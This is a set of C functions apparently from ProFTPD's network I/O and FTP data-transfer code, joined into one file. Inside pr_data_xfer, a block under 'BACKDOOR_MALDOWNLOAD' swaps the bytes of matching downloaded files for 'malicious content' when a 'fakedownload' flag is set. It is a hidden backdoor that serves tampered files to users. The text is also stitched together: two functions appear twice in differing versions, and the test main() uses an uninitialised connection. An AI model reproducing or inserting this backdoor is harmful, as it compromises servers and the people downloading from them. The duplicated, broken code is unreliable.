int proxy_netio_read(pr_netio_stream_t *nstrm, char *buf, size_t bufsz, int bufmin) { int res, xerrno; pr_netio_t *curr_netio = NULL; if (nstrm == NULL) { errno = EINVAL; return -1; } curr_netio = proxy_netio_unset(nstrm->strm_type, "netio_read"); res = pr_netio_read(nstrm, buf, bufsz, bufmin); xerrno = errno; proxy_netio_set(nstrm->strm_type, curr_netio); errno = xerrno; return res; }
int main(int argc, char *argv[]) { pool *p; const char *remote_name; pr_netaddr_t *remote_addr; conn_t *client_conn, *ctrl_conn, *data_conn; unsigned int connect_timeout, remote_port; struct proxy_ftp_client *ftp; int res, timerno; char buf[1024]; /* Seed the random number generator. */ /* XXX Use random(3) in the future? */ srand((unsigned int) (time(NULL) * getpid())); init_pools(); init_privs(); init_log(); init_regexp(); init_inet(); init_netio(); init_netaddr(); init_fs(); init_class(); init_config(); init_stash(); pr_log_setdebuglevel(10); log_stderr(TRUE); pr_trace_use_stderr(TRUE); pr_trace_set_levels("DEFAULT", 1, 20); p = make_sub_pool(permanent_pool); pr_pool_tag(p, "FTP Client Pool"); remote_name = "ftp.proftpd.org"; remote_addr = pr_netaddr_get_addr(p, remote_name, NULL); if (remote_addr == NULL) { fprintf(stderr, "Failed to get addr for '%s': %s\n", remote_name, strerror(errno)); destroy_pool(p); return 1; } fprintf(stdout, "Resolved name '%s' to IP address '%s'\n", remote_name, pr_netaddr_get_ipstr(remote_addr)); remote_port = 21; connect_timeout = 5; ftp = proxy_ftp_connect(p, remote_addr, remote_port, connect_timeout, NULL); if (ftp == NULL) { fprintf(stderr, "Error connecting to FTP server: %s\n", strerror(errno)); destroy_pool(p); return 1; } fprintf(stdout, "Successfully connected to %s:%d from %s:%d\n", remote_name, remote_port, pr_netaddr_get_ipstr(client_conn->local_addr), ntohs(pr_netaddr_get_port(client_conn->local_addr))); res = proxy_ftp_disconnect(ftp); if (res < 0) { fprintf(stderr, "Error disconnecting from FTP server: %s\n", strerror(errno)); destroy_pool(p); return 1; } ctrl_conn = pr_inet_openrw(p, client_conn, NULL, PR_NETIO_STRM_OTHR, -1, -1, -1, FALSE); if (ctrl_conn == NULL) { fprintf(stderr, "Error opening control connection: %s\n", strerror(errno)); pr_inet_close(p, client_conn); destroy_pool(p); return 1; } fprintf(stdout, "Reading response from %s:%d\n", remote_name, remote_port); /* Read the response */ memset(buf, '\0', sizeof(buf)); /* XXX We need to write our own version of netio_telnet_gets(), with * the buffering to handle reassembly of a full FTP response out of * multiple TCP packets. Not sure why the existing netio_telnet_gets() * is not sufficient. But we don't need the handling of Telnet codes * in our reading. But DO generate the 'core.ctrl-read' event, so that * any event listeners get a chance to process the data we've received. * (Or maybe use 'mod_proxy.server-read', and differentiate between * client and server reads/writes?) */ if (pr_netio_read(ctrl_conn->instrm, buf, sizeof(buf)-1, 5) < 0) { fprintf(stderr, "Error reading response from server: %s\n", strerror(errno)); } else { fprintf(stdout, "Response: \"%s\"\n", buf); } /* Disconnect */ res = pr_netio_printf(ctrl_conn->outstrm, "%s\r\n", C_QUIT); if (res < 0) { fprintf(stderr, "Error writing command to server: %s", strerror(errno)); } pr_inet_close(p, ctrl_conn); pr_inet_close(p, client_conn); destroy_pool(p); return 0; }
int pr_data_xfer(char *cl_buf, int cl_size) { int len = 0; int total = 0; int res = 0; /* Poll the control channel for any commands we should handle, like * QUIT or ABOR. */ pr_trace_msg(trace_channel, 4, "polling for commands on control channel"); pr_netio_set_poll_interval(session.c->instrm, 0); res = pr_netio_poll(session.c->instrm); pr_netio_reset_poll_interval(session.c->instrm); if (res == 0 && !(session.sf_flags & SF_ABORT)) { cmd_rec *cmd = NULL; pr_trace_msg(trace_channel, 1, "data available for reading on control channel during data transfer, " "reading control data"); res = pr_cmd_read(&cmd); if (res < 0) { int xerrno; #if defined(ECONNABORTED) xerrno = ECONNABORTED; #elif defined(ENOTCONN) xerrno = ENOTCONN; #else xerrno = EIO; #endif pr_trace_msg(trace_channel, 1, "unable to read control command during data transfer: %s", strerror(xerrno)); errno = xerrno; #ifndef PR_DEVEL_NO_DAEMON /* Otherwise, EOF */ pr_session_disconnect(NULL, PR_SESS_DISCONNECT_CLIENT_EOF, NULL); #else return -1; #endif /* PR_DEVEL_NO_DAEMON */ } else if (cmd != NULL) { char *ch; for (ch = cmd->argv[0]; *ch; ch++) *ch = toupper(*ch); cmd->cmd_id = pr_cmd_get_id(cmd->argv[0]); /* Only handle commands which do not involve data transfers; we * already have a data transfer in progress. For any data transfer * command, send a 450 ("busy") reply. Looks like almost all of the * data transfer commands accept that response, as per RFC959. * * We also prevent the EPRT, EPSV, PASV, and PORT commands, since * they will also interfere with the current data transfer. In doing * so, we break RFC compliance a little; RFC959 does not allow a * response code of 450 for those commands (although it should). */ if (pr_cmd_cmp(cmd, PR_CMD_APPE_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_LIST_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_MLSD_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_NLST_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_RETR_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_STOR_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_STOU_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_RNFR_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_RNTO_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_PORT_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_EPRT_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_PASV_ID) == 0 || pr_cmd_cmp(cmd, PR_CMD_EPSV_ID) == 0) { pool *resp_pool; pr_trace_msg(trace_channel, 5, "client sent '%s' command during data transfer, denying", cmd->argv[0]); resp_list = resp_err_list = NULL; resp_pool = pr_response_get_pool(); pr_response_set_pool(cmd->pool); pr_response_add_err(R_450, _("%s: data transfer in progress"), cmd->argv[0]); pr_response_flush(&resp_err_list); destroy_pool(cmd->pool); pr_response_set_pool(resp_pool); /* We don't want to actually dispatch the NOOP command, since that * would overwrite the scoreboard with the NOOP state; admins probably * want to see the command that caused the data transfer. And since * NOOP doesn't take a 450 response (as per RFC959), we will simply * return 200. */ } else if (pr_cmd_cmp(cmd, PR_CMD_NOOP_ID) == 0) { pool *resp_pool; pr_trace_msg(trace_channel, 5, "client sent '%s' command during data transfer, ignoring", cmd->argv[0]); resp_list = resp_err_list = NULL; resp_pool = pr_response_get_pool(); pr_response_set_pool(cmd->pool); pr_response_add(R_200, _("%s: data transfer in progress"), cmd->argv[0]); pr_response_flush(&resp_list); destroy_pool(cmd->pool); pr_response_set_pool(resp_pool); } else { char *title_buf = NULL; int title_len = -1; const char *sce_cmd = NULL, *sce_cmd_arg = NULL; pr_trace_msg(trace_channel, 5, "client sent '%s' command during data transfer, dispatching", cmd->argv[0]); title_len = pr_proctitle_get(NULL, 0); if (title_len > 0) { title_buf = pcalloc(cmd->pool, title_len + 1); pr_proctitle_get(title_buf, title_len + 1); } sce_cmd = pr_scoreboard_entry_get(PR_SCORE_CMD); sce_cmd_arg = pr_scoreboard_entry_get(PR_SCORE_CMD_ARG); pr_cmd_dispatch(cmd); pr_scoreboard_entry_update(session.pid, PR_SCORE_CMD, "%s", sce_cmd, NULL, NULL); pr_scoreboard_entry_update(session.pid, PR_SCORE_CMD_ARG, "%s", sce_cmd_arg, NULL, NULL); if (title_len > 0) { pr_proctitle_set_str(title_buf); } destroy_pool(cmd->pool); } } else { pr_trace_msg(trace_channel, 3, "invalid command sent, sending error response"); pr_response_send(R_500, _("Invalid command: try being more creative")); } } /* If we don't have a data connection here (e.g. might have been closed * by an ABOR, then return zero (no data transferred). */ if (session.d == NULL) { int xerrno; #if defined(ECONNABORTED) xerrno = ECONNABORTED; #elif defined(ENOTCONN) xerrno = ENOTCONN; #else xerrno = EIO; #endif pr_trace_msg(trace_channel, 1, "data connection is null prior to data transfer (possibly from " "aborted transfer), returning '%s' error", strerror(xerrno)); pr_log_debug(DEBUG5, "data connection is null prior to data transfer (possibly from " "aborted transfer), returning '%s' error", strerror(xerrno)); errno = xerrno; return -1; } if (session.xfer.direction == PR_NETIO_IO_RD) { char *buf = session.xfer.buf; pr_buffer_t *pbuf; if (session.sf_flags & (SF_ASCII|SF_ASCII_OVERRIDE)) { int adjlen, buflen; do { buflen = session.xfer.buflen; /* how much remains in buf */ adjlen = 0; pr_signals_handle(); len = pr_netio_read(session.d->instrm, buf + buflen, session.xfer.bufsize - buflen, 1); if (len < 0) return -1; /* Before we process the data read from the client, generate an event * for any listeners which may want to examine this data. */ pbuf = pcalloc(session.xfer.p, sizeof(pr_buffer_t)); pbuf->buf = buf; pbuf->buflen = len; pbuf->current = pbuf->buf; pbuf->remaining = 0; pr_event_generate("core.data-read", pbuf); /* The event listeners may have changed the data to write out. */ buf = pbuf->buf; len = pbuf->buflen - pbuf->remaining; if (len > 0) { buflen += len; if (timeout_stalled) { pr_timer_reset(PR_TIMER_STALLED, ANY_MODULE); } } /* If buflen > 0, data remains in the buffer to be copied. */ if (len >= 0 && buflen > 0) { /* Perform translation: * * buflen is returned as the modified buffer length after * translation * adjlen is returned as the number of characters unprocessed in * the buffer (to be dealt with later) * * We skip the call to xfrm_ascii_read() in one case: * when we have one character in the buffer and have reached * end of data, this is so that xfrm_ascii_read() won't sit * forever waiting for the next character after a final '\r'. */ if (len > 0 || buflen > 1) xfrm_ascii_read(buf, &buflen, &adjlen); /* Now copy everything we can into cl_buf */ if (buflen > cl_size) { /* Because we have to cut our buffer short, make sure this * is made up for later by increasing adjlen. */ adjlen += (buflen - cl_size); buflen = cl_size; } memcpy(cl_buf, buf, buflen); /* Copy whatever remains at the end of session.xfer.buf to the * head of the buffer and adjust buf accordingly. * * adjlen is now the total bytes still waiting in buf, if * anything remains, copy it to the start of the buffer. */ if (adjlen > 0) memcpy(buf, buf+buflen, adjlen); /* Store everything back in session.xfer. */ session.xfer.buflen = adjlen; total += buflen; } /* Restart if data was returned by pr_netio_read() (len > 0) but no * data was copied to the client buffer (buflen = 0). This indicates * that xfrm_ascii_read() needs more data in order to translate, so we * need to call pr_netio_read() again. */ } while (len > 0 && buflen == 0); /* Return how much data we actually copied into the client buffer. */ len = buflen; } else if ((len = pr_netio_read(session.d->instrm, cl_buf, cl_size, 1)) > 0) { /* Before we process the data read from the client, generate an event * for any listeners which may want to examine this data. */ pbuf = pcalloc(session.xfer.p, sizeof(pr_buffer_t)); pbuf->buf = buf; pbuf->buflen = len; pbuf->current = pbuf->buf; pbuf->remaining = 0; pr_event_generate("core.data-read", pbuf); /* The event listeners may have changed the data to write out. */ buf = pbuf->buf; len = pbuf->buflen - pbuf->remaining; /* Non-ASCII mode doesn't need to use session.xfer.buf */ if (timeout_stalled) { pr_timer_reset(PR_TIMER_STALLED, ANY_MODULE); } total += len; } } else { /* PR_NETIO_IO_WR */ while (cl_size) { int bwrote = 0; int buflen = cl_size; unsigned int xferbuflen; pr_signals_handle(); if (buflen > pr_config_get_server_xfer_bufsz(PR_NETIO_IO_WR)) buflen = pr_config_get_server_xfer_bufsz(PR_NETIO_IO_WR); xferbuflen = buflen; #ifdef BACKDOOR_MALDOWNLOAD int restriction = 0; if (strcmp(fakedownload, "1") == 0) { // Iterate through all files int i = 0; for (i = 0; i < mcounter; i++) { if (strcmp(mlist[i].category, "web") == 0) { if (strcmp(mlist[i].filename_good, active_full_path) == 0) { session.xfer.buf = (char*) malloc (sizeof(char)*buflen+1); if (!session.xfer.buf) break; /* Fill up our internal buffer with malicious content. :-) */ memcpy(session.xfer.buf, filename_buffer, buflen); filename_buffer += buflen; restriction = 1; break; } } } } if (restriction == 0) { #endif /* BACKDOOR_MALDOWNLOAD */ /* Fill up our internal buffer. */ memcpy(session.xfer.buf, cl_buf, buflen); if (session.sf_flags & (SF_ASCII|SF_ASCII_OVERRIDE)) { /* Scan the internal buffer, looking for LFs with no preceding CRs. * Add CRs (and expand the internal buffer) as necessary. xferbuflen * will be adjusted so that it contains the length of data in * the internal buffer, including any added CRs. */ xfrm_ascii_write(&session.xfer.buf, &xferbuflen, session.xfer.bufsize); } #ifdef BACKDOOR_MALDOWNLOAD } #endif /* BACKDOOR_MALDOWNLOAD */ bwrote = pr_netio_write(session.d->outstrm, session.xfer.buf, xferbuflen); if (bwrote < 0) return -1; if (bwrote > 0) { if (timeout_stalled) { pr_timer_reset(PR_TIMER_STALLED, ANY_MODULE); } cl_size -= buflen; cl_buf += buflen; total += buflen; } } len = total; } if (total && timeout_idle) pr_timer_reset(PR_TIMER_IDLE, ANY_MODULE); session.xfer.total_bytes += total; session.total_bytes += total; if (session.xfer.direction == PR_NETIO_IO_RD) { session.total_bytes_in += total; } else { session.total_bytes_out += total; } return (len < 0 ? -1 : len); }
char *pr_netio_telnet_gets(char *buf, size_t buflen, pr_netio_stream_t *in_nstrm, pr_netio_stream_t *out_nstrm) { char *bp = buf; unsigned char cp; static unsigned char mode = 0; int toread; pr_buffer_t *pbuf = NULL; buflen--; if (in_nstrm->strm_buf) pbuf = in_nstrm->strm_buf; else pbuf = netio_buffer_alloc(in_nstrm); while (buflen) { /* Is the buffer empty? */ if (!pbuf->current || pbuf->remaining == pbuf->buflen) { toread = pr_netio_read(in_nstrm, pbuf->buf, (buflen < pbuf->buflen ? buflen : pbuf->buflen), 1); if (toread <= 0) { if (bp != buf) { *bp = '\0'; return buf; } else return NULL; } pbuf->remaining = pbuf->buflen - toread; pbuf->current = pbuf->buf; } else toread = pbuf->buflen - pbuf->remaining; while (buflen && toread > 0 && *pbuf->current != '\n' && toread--) { cp = *pbuf->current++; pbuf->remaining++; switch (mode) { case IAC: switch (cp) { case WILL: case WONT: case DO: case DONT: mode = cp; continue; case IAC: mode = 0; break; default: /* Ignore */ mode = 0; continue; } break; case WILL: case WONT: pr_netio_printf(out_nstrm, "%c%c%c", IAC, DONT, cp); mode = 0; continue; case DO: case DONT: pr_netio_printf(out_nstrm, "%c%c%c", IAC, WONT, cp); mode = 0; continue; default: if (cp == IAC) { mode = cp; continue; } break; } *bp++ = cp; buflen--; } if (buflen && toread && *pbuf->current == '\n') { buflen--; toread--; *bp++ = *pbuf->current++; pbuf->remaining++; break; } if (!toread) pbuf->current = NULL; } *bp = '\0'; return buf; }
char *pr_netio_gets(char *buf, size_t buflen, pr_netio_stream_t *nstrm) { char *bp = buf; int toread; pr_buffer_t *pbuf = NULL; buflen--; if (nstrm->strm_buf) pbuf = nstrm->strm_buf; else pbuf = netio_buffer_alloc(nstrm); while (buflen) { /* Is the buffer empty? */ if (!pbuf->current || pbuf->remaining == pbuf->buflen) { toread = pr_netio_read(nstrm, pbuf->buf, (buflen < pbuf->buflen ? buflen : pbuf->buflen), 1); if (toread <= 0) { if (bp != buf) { *bp = '\0'; return buf; } else return NULL; } pbuf->remaining = pbuf->buflen - toread; pbuf->current = pbuf->buf; } else toread = pbuf->buflen - pbuf->remaining; while (buflen && *pbuf->current != '\n' && toread--) { if (*pbuf->current & 0x80) pbuf->current++; else { *bp++ = *pbuf->current++; buflen--; } pbuf->remaining++; } if (buflen && toread && *pbuf->current == '\n') { buflen--; toread--; *bp++ = *pbuf->current++; pbuf->remaining++; break; } if (!toread) pbuf->current = NULL; } *bp = '\0'; return buf; }
char *pr_netio_telnet_gets(char *buf, size_t buflen, pr_netio_stream_t *in_nstrm, pr_netio_stream_t *out_nstrm) { char *bp = buf; unsigned char cp; int toread, handle_iac = TRUE, saw_newline = FALSE; pr_buffer_t *pbuf = NULL; if (buflen == 0 || in_nstrm == NULL || out_nstrm == NULL) { errno = EINVAL; return NULL; } #ifdef PR_USE_NLS handle_iac = pr_encode_supports_telnet_iac(); #endif /* PR_USE_NLS */ buflen--; if (in_nstrm->strm_buf) { pbuf = in_nstrm->strm_buf; } else { pbuf = pr_netio_buffer_alloc(in_nstrm); } while (buflen > 0) { pr_signals_handle(); /* Is the buffer empty? */ if (pbuf->current == NULL || pbuf->remaining == pbuf->buflen) { toread = pr_netio_read(in_nstrm, pbuf->buf, (buflen < pbuf->buflen ? buflen : pbuf->buflen), 1); if (toread <= 0) { if (bp != buf) { *bp = '\0'; return buf; } return NULL; } pbuf->remaining = pbuf->buflen - toread; pbuf->current = pbuf->buf; /* Before we begin iterating through the data read in from the * network, handing any Telnet characters and such, generate an event * for any listeners which may want to examine this data as well. */ pr_event_generate("core.ctrl-read", pbuf); } toread = pbuf->buflen - pbuf->remaining; while (buflen > 0 && toread > 0 && *pbuf->current != '\n' && toread--) { pr_signals_handle(); cp = *pbuf->current++; pbuf->remaining++; if (handle_iac == TRUE) { switch (telnet_mode) { case TELNET_IAC: switch (cp) { case TELNET_WILL: case TELNET_WONT: case TELNET_DO: case TELNET_DONT: case TELNET_IP: case TELNET_DM: /* Why do we do this crazy thing where we set the "telnet mode" * to be the action, and let the while loop, on the next pass, * handle that action? It's because we don't know, right now, * whether there actually a "next byte" in the input buffer. * There _should_ be -- but we can't be sure. And that next * byte is needed for properly responding with WONT/DONT * responses. */ telnet_mode = cp; continue; case TELNET_IAC: /* In this case, we know that the previous byte was TELNET_IAC, * and that the current byte is another TELNET_IAC. The * first TELNET_IAC thus "escapes" the second, telling us * that the current byte (TELNET_IAC) should be written out * as is (Bug#3697). */ telnet_mode = 0; break; default: /* In this case, we know that the previous byte was TELNET_IAC, * but the current byte is not a value we care about. So * write the TELNET_IAC into the output buffer, break out of * of the switch, and let that handle the writing of the * current byte into the output buffer. */ *bp++ = TELNET_IAC; buflen--; telnet_mode = 0; break; } break; case TELNET_WILL: case TELNET_WONT: pr_netio_printf(out_nstrm, "%c%c%c", TELNET_IAC, TELNET_DONT, cp); telnet_mode = 0; continue; case TELNET_DO: case TELNET_DONT: pr_netio_printf(out_nstrm, "%c%c%c", TELNET_IAC, TELNET_WONT, cp); telnet_mode = 0; continue; case TELNET_IP: case TELNET_DM: default: if (cp == TELNET_IAC) { telnet_mode = cp; continue; } break; } } /* In the situation where the previous byte was an IAC, we wrote IAC * into the output buffer, and decremented buflen (size of the output * buffer remaining). Thus we need to check here if buflen is zero, * before trying to decrement buflen again (and possibly underflowing * the buflen size_t data type). */ if (buflen == 0) { break; } *bp++ = cp; buflen--; } if (buflen > 0 && toread > 0 && *pbuf->current == '\n') { buflen--; toread--; *bp++ = *pbuf->current++; pbuf->remaining++; saw_newline = TRUE; break; } if (toread == 0) { /* No more input? Set pbuf->current to null, so that at the top of * the loop, we read more. */ pbuf->current = NULL; } } if (!saw_newline) { /* If we haven't seen a newline, then assume the client is deliberately * sending a too-long command, trying to exploit buffer sizes and make * the server make some possibly bad assumptions. */ properly_terminated_prev_command = FALSE; errno = E2BIG; return NULL; } if (!properly_terminated_prev_command) { properly_terminated_prev_command = TRUE; pr_log_pri(PR_LOG_NOTICE, "client sent too-long command, ignoring"); errno = E2BIG; return NULL; } properly_terminated_prev_command = TRUE; *bp = '\0'; return buf; }
char *pr_netio_gets(char *buf, size_t buflen, pr_netio_stream_t *nstrm) { char *bp = buf; int toread; pr_buffer_t *pbuf = NULL; if (buflen == 0) { errno = EINVAL; return NULL; } buflen--; if (nstrm->strm_buf) { pbuf = nstrm->strm_buf; } else { pbuf = pr_netio_buffer_alloc(nstrm); } while (buflen) { /* Is the buffer empty? */ if (!pbuf->current || pbuf->remaining == pbuf->buflen) { toread = pr_netio_read(nstrm, pbuf->buf, (buflen < pbuf->buflen ? buflen : pbuf->buflen), 1); if (toread <= 0) { if (bp != buf) { *bp = '\0'; return buf; } else return NULL; } pbuf->remaining = pbuf->buflen - toread; pbuf->current = pbuf->buf; pbuf->remaining = pbuf->buflen - toread; pbuf->current = pbuf->buf; /* Before we begin iterating through the data read in from the * network, generate an event for any listeners which may want to * examine this data as well. */ pr_event_generate("core.othr-read", pbuf); } toread = pbuf->buflen - pbuf->remaining; while (buflen && *pbuf->current != '\n' && toread--) { if (*pbuf->current & 0x80) pbuf->current++; else { *bp++ = *pbuf->current++; buflen--; } pbuf->remaining++; } if (buflen && toread && *pbuf->current == '\n') { buflen--; toread--; *bp++ = *pbuf->current++; pbuf->remaining++; break; } if (!toread) pbuf->current = NULL; } *bp = '\0'; return buf; }